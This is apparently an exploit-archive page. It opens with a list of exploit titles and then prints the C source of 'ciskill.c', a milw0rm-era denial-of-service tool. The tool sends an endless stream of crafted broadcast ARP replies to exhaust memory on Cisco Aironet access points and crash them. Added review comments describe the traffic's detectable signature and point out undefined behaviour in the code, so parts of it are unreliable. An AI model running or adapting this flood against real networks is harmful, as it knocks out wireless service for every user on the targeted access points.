
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow 
Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
//
// Cisco Killer - ciskill.c
//
// Usage: ./ciskill [device]
//
// Author: Pasv (pasvninja [at] gmail.com)
//
// Credit: This exploit takes advantage of a vulnerability that was
// discovered by Eric Smith on January 12, 2006 (bid:16217)
//
// Greets to NW, zimmy, GSO, and the rest.
//
// Description: The vulnerability exists in the way the affected versions
// below handle ARP replies: if enough specially crafted ARP packets are sent
// on the network with the affected systems, they exhaust the access point's
// memory, which within a few seconds (depending on the speed of the attacker
// and the memory of the target) crashes the system and stops all
// incoming/outgoing traffic.
//
// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility
// for your actions (like a knife maker).
//
// Versions affected:
// Cisco Aironet 350 IOS
// Cisco Aironet 1400
// Cisco Aironet 1300
// Cisco Aironet 1240AG
// Cisco Aironet 1230AG
// Cisco Aironet 1200
// Cisco Aironet 1130AG
// Cisco Aironet 1100
// (this includes most linksys wireless access points)
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/sockios.h>
// Edit this packet accordingly if the target is picky
//
// Static frame template: a 14-byte Ethernet header followed by a 28-byte ARP
// reply, 42 bytes in total (the string literal's trailing NUL makes the array
// one byte longer, but main() sends only the first 42).
//
// Byte offsets, counted from the literals below:
//    0- 5  Ethernet destination      22-27  ARP sender MAC
//    6-11  Ethernet source           28-31  ARP sender IP
//   12-13  EtherType                 32-37  ARP target MAC
//   14-21  ARP fixed header          38-41  ARP target IP
// main() overwrites pkt[28] and pkt[38], i.e. the first octet of the sender
// and target IP fields; every other byte stays as written here.
//
// What this looks like on the wire: a broadcast ARP reply (opcode 2) that was
// never requested, with Ethernet source, ARP sender MAC and ARP target MAC all
// 41:41:41:41:41:41, and sender/target IPs of the form x.65.65.65. A capture
// filter or switch log matching that combination identifies frames built from
// this unmodified template.
char pkt[]=
// Ethernet header
"\xff\xff\xff\xff\xff\xff" // Destination: broadcast
"AAAAAA" // Source: 41:41:41:41:41:41
"\x08\x06" // Pkt type: ARP
// ARP header
"\x00\x01" // Hardware type: Ethernet
"\x08\x00" // Protocol: IP
"\x06" // Hardware size: 6
"\x04" // Protocol size: 4
"\x00\x02" // Opcode: Reply
"AAAAAA" // Sender (Mac): 41:41:41:41:41:41
"AAAA" // Sender (IP): 65.65.65.65
"AAAAAA" // Target (mac): 41:41:41:41:41:41
"AAAA" // Target (IP): 65.65.65.65
; // End of Packet
// Entry point: writes the ARP reply template in pkt to one network interface
// in an endless loop, changing the first octet of the sender and target IP
// fields on each iteration.
//
// argv[1] is used as the interface name when exactly one argument is given.
// The loop has no exit condition, so the function never returns; the process
// ends only through exit(1) (caller is not root) or an external signal.
//
// NOTE(review): several statements below are undefined behaviour or rely on
// unchecked results (marked inline), so what the program actually prints or
// sends can differ from what the source appears to say.
int main(int argc, char **argv) {
    FILE *fp;
    int sock, seed;
    long count;
    char *device;
    in_addr_t addr;
    struct sockaddr sin;

    printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n");
    // Refuses to run unless the real UID is 0.
    if(getuid()) {
        printf("Must be root to inject arp packets!\n");
        exit(1);
    }

    if(argc != 2) {
        // NOTE(review): device has not been pointed at any storage at this
        // point, so this copy is undefined behaviour.
        strcpy(device,"wlan0");
    }
    else {
        device=argv[1];
    }

    // Seeds rand() from /dev/urandom. "%d" parses decimal text, not raw bytes;
    // neither the fopen() nor the fscanf() result is checked, and seed keeps
    // its indeterminate initial value when no integer is parsed.
    fp = fopen("/dev/urandom", "r");
    fscanf(fp,"%d", &seed);
    fclose(fp);
    srand(seed);

    // The interface name is carried in sa_data of a generic sockaddr.
    // strncpy() with the full 14-byte field size leaves it unterminated when
    // the name is 14 characters or longer.
    memset(&sin, 0, sizeof(sin));
    sin.sa_family = AF_UNSPEC;
    strncpy(sin.sa_data,device, 14);

    // Link-level socket through the SOCK_PACKET interface; the return value is
    // not checked, so a failure surfaces only as -1 from sendto() below.
    // NOTE(review): 0x300 looks like ETH_P_ALL (0x0003) byte-swapped for a
    // little-endian host — confirm.
    sock = socket(PF_INET, SOCK_PACKET, 0x300);

    printf("Using device: %s\n\n", device);

    // stupid
    // Five one-second pauses before the send loop starts.
    printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n");
    sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1);

    while(1) {
        // Sum of four values in 0..254, truncated to one byte by the casts
        // below, so at most 256 distinct addresses (x.65.65.65) ever appear.
        addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff);
        pkt[28] = (char)addr;   // first octet of the ARP sender IP
        pkt[38] = (char)addr;   // first octet of the ARP target IP
        // NOTE(review): count is never initialised, so the printed frame
        // number is indeterminate.
        count++;
        // No delay between sends: frames leave as fast as sendto() returns.
        // On the wire this is a sustained stream of broadcast ARP replies from
        // one source MAC advertising many sender IPs, the pattern that ARP
        // rate limiting or ARP inspection at the access layer is meant to
        // catch.
        printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin)));
    }
}
// milw0rm.com [2006-01-25]